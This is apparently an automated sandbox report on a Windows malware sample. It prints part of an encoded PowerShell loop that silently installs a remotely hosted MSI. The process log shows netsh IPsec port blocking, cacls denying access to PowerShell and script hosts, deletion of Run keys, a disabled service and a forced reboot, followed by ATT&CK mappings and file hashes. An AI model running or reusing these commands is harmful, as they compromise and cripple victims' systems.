wA5AGUAMgAwADgANwBhAGQAZQA4ADIANwAzAGUANQA0ADQAMAAwADkAZAA2ADgAZQAxAC8AUwBzAGQAeAB4AEkAcAA4AEQAcQBlAFEALgBqAHAAZwAiAA0ACgAkAG0AcwBpAHAAYQB0AGgAQQBMAEwAIAA9ACAAQAAoACIAJABtAHMAaQBwAGEAdABoAEEAIgAsACIAJABtAHMAaQBwAGEAdABoAEEAIgApAA0ACgAkAE4AZABTAFUASQB3AHUAdQBXAG4AcABZAEgAegBGAHUAIAA9ACAAZwBlAHQALQByAGEAbgBkAG8AbQAgACQAbQBzAGkAcABhAHQAaABBAEwATAA7AA0ACgBbAFAARgA4ADgAZABOAGMAZABzAEQARABxAGUANwBaAGYAXQA6ADoATQBzAGkAUwBlAHQASQBuAHQAZQByAG4AYQBsAFUASQAoADIALAAwACkAOwANAAoAWwBQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAF0AOgA6AE0AcwBpAEkAbgBzAHQAYQBsAGwAUAByAG8AZAB1AGMAdAAoACIAJABOAGQAUwBVAEkAdwB1AHUAVwBuAHAAWQBIAHoARgB1ACIALAAiACIAKQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAA0ACgB9AA0ACgB1AG4AdABpAGwAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAAtAG4AYQBtAGUAIABTAHQAYQB5AE8AbgBUAG8AcAApAA0ACgA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3308
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rggv1fbn\rggv1fbn.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2276
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA519.tmp" "c:\Users\Admin\AppData\Local\Temp\rggv1fbn\CSCA590C36B64244F50A7B939F1BC9B4E.TMP"
        7⤵
        
        PID:2948

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4840
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 3839D91D0959710BD627596DDF39360B
  2⤵
  - Loads dropped DLL
  PID:4168
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 197B3FAD1AF5F72B47A4472650F25C5A E Global\MSI0000
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  PID:4716
- - C:\Windows\SysWOW64\powercfg.exe
    "C:\Windows\SysWOW64\powercfg.exe" /S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2236
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1848
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add policy name=qianye
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filterlist name=Filter1
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
    3⤵
    PID:3356
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
    3⤵
    PID:3780
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
    3⤵
    PID:512
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
    3⤵
    PID:4160
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
    3⤵
    PID:3212
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP
    3⤵
    PID:5108
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP
    3⤵
    PID:3344
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP
    3⤵
    PID:4520
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block
    3⤵
    PID:220
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1
    3⤵
    PID:720
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static set policy name=qianye assign=y
    3⤵
    PID:4660
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\jscript.dll
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\jscript.dll /E /P everyone:N
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\jscript.dll
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4820
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\jscript.dll /E /P everyone:N
    3⤵
    PID:228
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\cscript.exe
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4672
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\cscript.exe /E /P everyone:N
    3⤵
    PID:4888
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\cscript.exe
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4284
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\cscript.exe /E /P everyone:N
    3⤵
    PID:3536
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4512
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4548
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N
    3⤵
    PID:516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\SysWOW64\reg.exe" delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /va /f
    3⤵
    PID:3372
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg /f
    3⤵
    PID:4736
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\SysWOW64\sc.exe" stop wmiApSrv
    3⤵
    - Launches sc.exe
    PID:3248
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\SysWOW64\sc.exe" config wmiApSrv start=disabled
    3⤵
    - Launches sc.exe
    PID:4132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e57b9ec.rbs

Filesize
3KB

MD5
8c0c8d57a5a858eb590e91b5b30a7b0a

SHA1
7a1a5b2a523b59b82273f31a3dbb956d81ea786a

SHA256
3b00859273a3b8b6066691c75e5c51b403188f2c55292125a5eb57c3c1c1cea1

SHA512
ced6c80e492a722ead4b14228f813a1bb0b741fab17e06d0fca4bfafeadcc41c3310008ce056a3f71f3bb455a9e0032e9ae04deca7df8277bb7c69de3825b432

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA519.tmp

Filesize
1KB

MD5
b82587d8b1696d4e955d8600f4428afc

SHA1
aef7b28d1a11463a3834a4e5275407873c364132

SHA256
1a7ed1cbf13a9c3793799ccac9a8929d36fc356ff4dd8caf974200c1aefe38b2

SHA512
e6eba1d9439b352626c2d75fd246243e6c8be9a6e6f06da07a398a68f84a948e17c81d83c1af1c8c46a188d54a356020531ab0d7f161d650cb91f6dc5eaa596d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qetgp1qd.3ak.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rggv1fbn\rggv1fbn.dll

Filesize
3KB

MD5
b6f768e299ec7a1d56c81b47a7d3c049

SHA1
4247e844bde4a8f1f0f7694acf8d6ae82b2a156c

SHA256
92a0bc5ebf5083ba1922408b70c877508bad21702d29fdd45dce07f70ae2d028

SHA512
b6e340aeb926079c0217651a7ff3656aa4dbbb7ea907f2ccd7fa634dcd028e86832ddc03637859a95ffeb2fab22c7c298fe59c0429dc9fd3caec5826df15cc5e

Download Submit
C:\Windows\Installer\MSIA8C3.tmp

Filesize
2.9MB

MD5
eb9a4cf233789b96f940be0186a26988

SHA1
002a1cee740fa212732379d1f00dbcf7c0cccbf2

SHA256
24d40ba4bf19e3cb942918eb8091ab467b11d5d737aef8e37cffc5306d0081d8

SHA512
725eefc24cf43ad0d5022f20608b1d149e9a4285cde7dc21b621aca3647d402a2ac7a2c0751614bae5f6d98c2b52e280e471f7f67f8916041c042bd1911784ce

Download Submit
C:\Windows\Installer\MSIB027.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIB027.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIB604.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIB604.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIB885.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIB885.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIB885.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIB971.tmp

Filesize
537KB

MD5
d7ec04b009302b83da506b9c63ca775c

SHA1
6fa9ea09b71531754b4cd05814a91032229834c0

SHA256
00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4

SHA512
171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c

Download Submit
C:\Windows\Installer\MSIB971.tmp

Filesize
537KB

MD5
d7ec04b009302b83da506b9c63ca775c

SHA1
6fa9ea09b71531754b4cd05814a91032229834c0

SHA256
00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4

SHA512
171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c

Download Submit
C:\Windows\Installer\MSIB9DF.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIB9DF.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rggv1fbn\CSCA590C36B64244F50A7B939F1BC9B4E.TMP

Filesize
652B

MD5
fd556046c64be200a9bedc55ffd422f3

SHA1
573023a5fa861d9b1fbcc4ec6e8732e6d5c3fc03

SHA256
5a02430d7a0c19d05bc63ef0c8c9393d8c0973a218c6af567b1f5386b90b44f2

SHA512
d39be27808fb7d7b27a7276f1b33a17f950d1c94fb9bbf94c22d9c03b6e7748763ea2d9b720df2c22c5bbc1077d6e626f0df53b82a721ea58a8553e35f2c9110

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rggv1fbn\rggv1fbn.0.cs

Filesize
354B

MD5
5cc66596055771b708c426b09785ed18

SHA1
fe11be68b5f5f01304e2c6b62458ba70ccc9a575

SHA256
530c7292814fa916aa2846672d0bd17cb4ba54cb8f4f61b9d84e01a51b857c08

SHA512
dc0c9385a85ade45584fc782de2ab285d5ceb535d0ef6d19b610e34c1fde5e6e76fc88d0b6b0e9f922562c4fe26aaaccf6204fae5053e3679f3a104cbf2dfd5c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rggv1fbn\rggv1fbn.cmdline

Filesize
369B

MD5
7110b583e38c4b53e6301ee10e077f92

SHA1
ec8b25f61af8e3e51ade69b8b03f917b966965a8

SHA256
31eba742505d5b3f45f8d2c37145950f4170cadfba268bea8c45047b93cb9dd3

SHA512
08a4bafb56a37f923296108edd67093ea1fe4ab96ea24848a34d5598535339e90810271e1062fc7134a59ed8c180efbd90f8ac5ba25dec63c12d9693de491142

Download Submit
memory/1848-161-0x0000000005F40000-0x0000000005FA6000-memory.dmp

Filesize
408KB

Download
memory/1848-160-0x0000000005860000-0x0000000005882000-memory.dmp

Filesize
136KB

Download
memory/1848-157-0x0000000072C50000-0x0000000073400000-memory.dmp

Filesize
7.7MB

Download
memory/1848-162-0x0000000006020000-0x0000000006086000-memory.dmp

Filesize
408KB

Download
memory/1848-158-0x0000000002D80000-0x0000000002D90000-memory.dmp

Filesize
64KB

Download
memory/1848-159-0x0000000005910000-0x0000000005F38000-memory.dmp

Filesize
6.2MB

Download
memory/1848-156-0x0000000002CF0000-0x0000000002D26000-memory.dmp

Filesize
216KB

Download
memory/2012-122-0x000001F4FD160000-0x000001F4FD170000-memory.dmp

Filesize
64KB

Download
memory/2012-115-0x00007FFC85C30000-0x00007FFC866F1000-memory.dmp

Filesize
10.8MB

Download
memory/2012-123-0x000001F4FD160000-0x000001F4FD170000-memory.dmp

Filesize
64KB

Download
memory/2012-130-0x000001F4FD160000-0x000001F4FD170000-memory.dmp

Filesize
64KB

Download
memory/2012-127-0x000001F4FD160000-0x000001F4FD170000-memory.dmp

Filesize
64KB

Download
memory/2012-74-0x00007FFC85C30000-0x00007FFC866F1000-memory.dmp

Filesize
10.8MB

Download
memory/2012-78-0x000001F4FD160000-0x000001F4FD170000-memory.dmp

Filesize
64KB

Download
memory/2012-76-0x000001F4FD160000-0x000001F4FD170000-memory.dmp

Filesize
64KB

Download
memory/2012-75-0x000001F4FD160000-0x000001F4FD170000-memory.dmp

Filesize
64KB

Download
memory/2736-29-0x00000279166C0000-0x0000027916EC0000-memory.dmp

Filesize
8.0MB

Download
memory/2736-9-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-62-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-222-0x00007FFC73150000-0x00007FFC73160000-memory.dmp

Filesize
64KB

Download
memory/2736-221-0x00007FFC73150000-0x00007FFC73160000-memory.dmp

Filesize
64KB

Download
memory/2736-50-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-220-0x00007FFC73150000-0x00007FFC73160000-memory.dmp

Filesize
64KB

Download
memory/2736-77-0x00000279166C0000-0x0000027916EC0000-memory.dmp

Filesize
8.0MB

Download
memory/2736-48-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-90-0x000002791B850000-0x000002791C820000-memory.dmp

Filesize
15.8MB

Download
memory/2736-219-0x00007FFC73150000-0x00007FFC73160000-memory.dmp

Filesize
64KB

Download
memory/2736-1-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-3-0x00007FFC73150000-0x00007FFC73160000-memory.dmp

Filesize
64KB

Download
memory/2736-5-0x00007FFC73150000-0x00007FFC73160000-memory.dmp

Filesize
64KB

Download
memory/2736-4-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-2-0x00007FFC73150000-0x00007FFC73160000-memory.dmp

Filesize
64KB

Download
memory/2736-7-0x00007FFC73150000-0x00007FFC73160000-memory.dmp

Filesize
64KB

Download
memory/2736-6-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-8-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-10-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-46-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-11-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-12-0x00007FFC70D40000-0x00007FFC70D50000-memory.dmp

Filesize
64KB

Download
memory/2736-13-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-14-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-15-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-16-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-30-0x000002791B850000-0x000002791C820000-memory.dmp

Filesize
15.8MB

Download
memory/2736-0-0x00007FFC73150000-0x00007FFC73160000-memory.dmp

Filesize
64KB

Download
memory/2736-21-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-22-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-19-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-20-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-18-0x00007FFCB30D0000-0x00007FFCB32C5000-memory.dmp

Filesize
2.0MB

Download
memory/2736-17-0x00007FFC70D40000-0x00007FFC70D50000-memory.dmp

Filesize
64KB

Download
memory/2936-60-0x00007FFC85C30000-0x00007FFC866F1000-memory.dmp

Filesize
10.8MB

Download
memory/2936-63-0x0000020890000000-0x0000020890010000-memory.dmp

Filesize
64KB

Download
memory/2936-61-0x0000020890000000-0x0000020890010000-memory.dmp

Filesize
64KB

Download
memory/2936-49-0x0000020890000000-0x0000020890010000-memory.dmp

Filesize
64KB

Download
memory/2936-95-0x0000020890000000-0x0000020890010000-memory.dmp

Filesize
64KB

Download
memory/2936-105-0x0000020890000000-0x0000020890010000-memory.dmp

Filesize
64KB

Download
memory/2936-98-0x00007FFC85C30000-0x00007FFC866F1000-memory.dmp

Filesize
10.8MB

Download
memory/2936-99-0x0000020890000000-0x0000020890010000-memory.dmp

Filesize
64KB

Download
memory/3308-143-0x00007FFC85C30000-0x00007FFC866F1000-memory.dmp

Filesize
10.8MB

Download
memory/3308-92-0x000001D8E2A30000-0x000001D8E2A40000-memory.dmp

Filesize
64KB

Download
memory/3308-154-0x000001D8E2A30000-0x000001D8E2A40000-memory.dmp

Filesize
64KB

Download
memory/3308-155-0x000001D8E2A30000-0x000001D8E2A40000-memory.dmp

Filesize
64KB

Download
memory/3308-144-0x000001D8E2A30000-0x000001D8E2A40000-memory.dmp

Filesize
64KB

Download
memory/3308-113-0x000001D8FCC10000-0x000001D8FCC18000-memory.dmp

Filesize
32KB

Download
memory/3308-91-0x00007FFC85C30000-0x00007FFC866F1000-memory.dmp

Filesize
10.8MB

Download
memory/4392-96-0x000002264C180000-0x000002264C190000-memory.dmp

Filesize
64KB

Download
memory/4392-94-0x000002264C180000-0x000002264C190000-memory.dmp

Filesize
64KB

Download
memory/4392-45-0x000002264C180000-0x000002264C190000-memory.dmp

Filesize
64KB

Download
memory/4392-93-0x00007FFC85C30000-0x00007FFC866F1000-memory.dmp

Filesize
10.8MB

Download
memory/4392-47-0x000002264C180000-0x000002264C190000-memory.dmp

Filesize
64KB

Download
memory/4392-97-0x000002264C180000-0x000002264C190000-memory.dmp

Filesize
64KB

Download
memory/4392-44-0x000002264C180000-0x000002264C190000-memory.dmp

Filesize
64KB

Download
memory/4392-39-0x000002264C190000-0x000002264C1B2000-memory.dmp

Filesize
136KB

Download
memory/4392-43-0x00007FFC85C30000-0x00007FFC866F1000-memory.dmp

Filesize
10.8MB

Download